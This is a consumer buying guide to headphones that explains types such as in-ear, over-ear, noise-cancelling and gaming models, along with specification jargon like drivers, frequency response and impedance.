Whether it's the cheap plastic pair that comes bundled with your smartphone or the big expensive cans with a giant 'b' on the side, we've all used headphones at some point. Getting the sound right can make all the difference between a boring bus ride and an emotional journey. But there's more to headphones than what you see. A lot of science and engineering goes into making a pair of headphones sound a particular way. The sound can be tuned in an infinite number of ways, and enjoying the audio experience is more about matching a pair of headphones to the music you're used to listening to than simply picking by brand or looks.
Our guide will help you get a better understanding of what to look for in headphones, and how to make an informed choice when you're actually shopping for a pair. In case you're confused by any of the terms used, jump down to check out our jargon buster. And in the following weeks, we will even help you pick a pair depending upon how much you are looking to spend.
Types of headphones
In-Ears
Also known as IEMs (In-Ear Monitors), in-ear headphones are the smallest and most portable of all the different kinds. Each earbud fits into your ear canal and is driven by small drivers (see below), usually 8-10mm in size. They can be quickly and easily wrapped and stored, which makes them ideal for use when commuting and travelling.
Pros: Thanks to the small size and light weight, these in-ears are usually comfortable to wear for hours on end.
Cons: Many users do not like the invasive nature of the fit and prefer to use larger on-ear or over-ear headphones.
On-Ears
Also known as supra-aural headphones, on-ears literally sit on your ears, and are therefore much bigger than in-ears. This style of headphones uses larger driver casings, along with a headband that keeps the ear cups securely in place on your ears. Typically, on-ear headsets use 30-40mm drivers.
Pros: Typically more comfortable than in-ears for short periods of use, and can usually be folded up to pack away when not in use.
Cons: Not as portable as in-ears. Since the ear cups sit on top of your ears, they may not be comfortable over long hours of use.
Over-Ears
Also known as around-ears and circum-aural headphones, over-ears are the largest and often the most comfortable kind of headphones. Like on-ears, over-ears have large driver casings and a headband, but the ear cups wrap completely around your ears, rather than resting on them. Because of the large size of the casing, the drivers can be much larger at 45mm and above, which allows for a louder and more detailed sound signature.
Pros: Usually louder, with a more detailed sound signature. Also the most comfortable kind of headphones, and they offer passive sound isolation by completely enveloping your ears.
Cons: Usually the least portable, over-ears are more suited for home or office use.
Specialised Headphones
Noise Cancelling
These headphones use active noise cancelling technology, where certain sounds are drowned out to offer peace and quiet to the listener. Active noise cancelling headphones use small microphones that pick up outside noise, and produce a matching sound wave of inverted phase (an "anti-noise" signal) that cancels it out. The technology does not work well with sounds that vary too much, as the circuitry cannot adapt quickly enough to rapidly changing frequencies. Instead, noise cancelling headphones are useful for drowning out steady droning sounds, such as airplane engines, factory machinery, air-conditioner hum and other uniform, constant sounds.
Pros: Good for some peace and quiet in factories, airplanes and noisy environments.
Cons: Noise cancelling requires additional power, so charging/batteries will be needed. Additionally, noise-cancelling technology only works with certain kinds of sounds and cannot block out all sound entirely.
Gaming
Gaming headphones are designed to be used when playing video games on computers, consoles or portable devices, to enhance the in-game audio experience. Some, such as the Steelseries Siberia Elite Prism, are designed to provide a virtual surround sound experience, while others like the Razer Tiamat provide true 7.1-channel surround sound. This helps gamers identify the direction a sound is coming from. For example, in first-person shooters, a good headset will let you identify which direction the enemy is firing at you from. These headphones are usually tuned to enhance dialogue and sound effects, and also have capable microphones for multiplayer voice chat.
Pros: Gaming headphones provide an excellent surround sound effect, and are tuned for picking up direction and detail in the sound.
Cons: Usually not good enough for listening to music, as gaming headphones are tuned too specifically for games.
Wireless
These headphones are free of cords and cables, and can be used comfortably without worrying about cable length and tangling. Wireless headphones usually work on one of three major transmission technologies: radio frequency, infrared and Bluetooth. The first two require a dedicated base unit which connects to the source device and transmits the audio to the headphones, while the third uses Bluetooth and can be paired wirelessly with a wide range of smartphones, tablets and computers. RF headphones usually work over larger distances, infrared headphones rely on line of sight, and Bluetooth headphones (typically Class 2 devices) have a practical range of around 10m.
Pros: Better portability and more suitable for outdoor use. Also useful at home when the source device is some distance away, such as when watching TV or listening to music in the living room.
Cons: Sound quality is usually not as good as wired headphones. Range issues and battery life can also create problems in the sound and listening experience.
These are the main types of headphones you'll be looking at in the market, but if you're confused by some of the jargon you come across in the shops, don't worry. There are a few basic terms you should know about, and you can probably ignore the rest. You'll find most of these mentioned on e-commerce websites, or on the box of the set you're buying.
Headphone Jargon
Drivers
The core components of any headphones, the drivers convert the electrical signal fed to the headphones into sound that can be perceived by the human ear. There are various types of drivers used in headphones, including the most commonly used moving coil (dynamic) drivers, balanced armature drivers, planar magnetic drivers and electrostatic drivers, among others. They use different technologies to produce the sound, with some offering better, more powerful sound than others. Dynamic drivers are used in all kinds of headphones; balanced armature drivers are generally used in in-ear headphones because of their small size; planar magnetic and electrostatic drivers are the largest and are usually found in built-for-home over-ear headphones.
Some headphones, known as hybrids, use a combination of two driver types (most commonly dynamic and balanced armature drivers). Generally speaking, bigger drivers don't necessarily mean better sound, as there are other factors as well, but size is a contributing factor, particularly for bass. It's best to audition headphones before buying, or read reviews, to make sure the product suits you. Typically, earphones like the ones bundled with your phone will use drivers around 15mm, while over-ear sets will be around 30-50mm.
Closed- and open-back
Headphones can be either closed or open at the back of the driver enclosure. Since a driver fires both into and away from your ear, an open-back headset will allow the sound to escape outside, while a closed-back headset will block the exit of the outward sound. There are pros and cons to both.
Closed-back headphones prevent others from listening to what you're listening to and are therefore more suited for public places as opposed to open-back headphones which leak sound and are perceived as inconsiderate to use in public. However, open-back headphones (like the ones pictured below) have a much more open sound, giving a more comfortable and realistic listening experience, while closed-back headphones sound more 'in-your-head'. Suitability depends on the purpose for which you need the headphones, and auditioning or reading reviews is recommended.
Frequency response
The frequency response range of headphones denotes the full range of sonic frequencies that a pair of headphones can reproduce. The human ear can only hear frequencies from roughly 20Hz to 20,000Hz, so most headphones aim to cover this range. However, some headphones extend the range at both ends in order to provide deeper responses. Although these extremes can't be heard, they can be felt to a small extent along with the audible range, and a wider range often allows for better tone and handling in the midrange, lows and highs. Check the frequency range on the box for an indication of how those particular cans will handle frequencies.
Soundstaging and imaging
These terms represent the ability of headphones to create an accurate sonic stage and image within your mind. Good soundstaging and imaging will create the impression of a live performance, where individual elements of the sound are distinct and feel like they are originating from specific locations on the virtual stage. Separation of sonic elements is also a function of imaging, where better separation represents a more realistic, true-to-life sound. This is best judged by listening and keeping your ears open for separation and clarity, so you won't find it on the specifications of the headphones, but you'll often see it mentioned in reviews.
Impedance
In simple terms, headphone impedance (measured in ohms) indicates how hard a pair of headphones is to drive: the higher the impedance, the more voltage the source must supply to reach the same loudness. Low-impedance headphones need less voltage to drive, and can therefore easily be used with source devices that have weaker amplification, such as smartphones, media players and other portable devices. They are also more susceptible to being damaged if too much amplification is delivered to them.
High-impedance headphones require dedicated amplifiers or increased amplification to drive, and deliver a more powerful, controlled performance as a result. They are less susceptible to damage, as they are designed to handle more amplification. When choosing headphones, it's important to note the impedance and buy according to the source device you intend to use. Look out for the impedance figure on the box, and choose as per your source devices. An impedance of 15 ohms and under is low and easy to drive, while 50 ohms and above may require some amplification for best results. However, most smartphones and media players are designed to drive headphones with impedance as high as 80 ohms, so an impedance on the higher side may not be a serious issue.
These are the main "specifications" that manufacturers tout, and all of them have a different impact on the audio you're listening to, as we explain above. When you're buying a headset, apart from the design types, these specifications are some of the important things you should know about.
What are the features that you normally look for in your headsets? Is there any jargon you've come across that doesn't make sense? Let us know via the comments.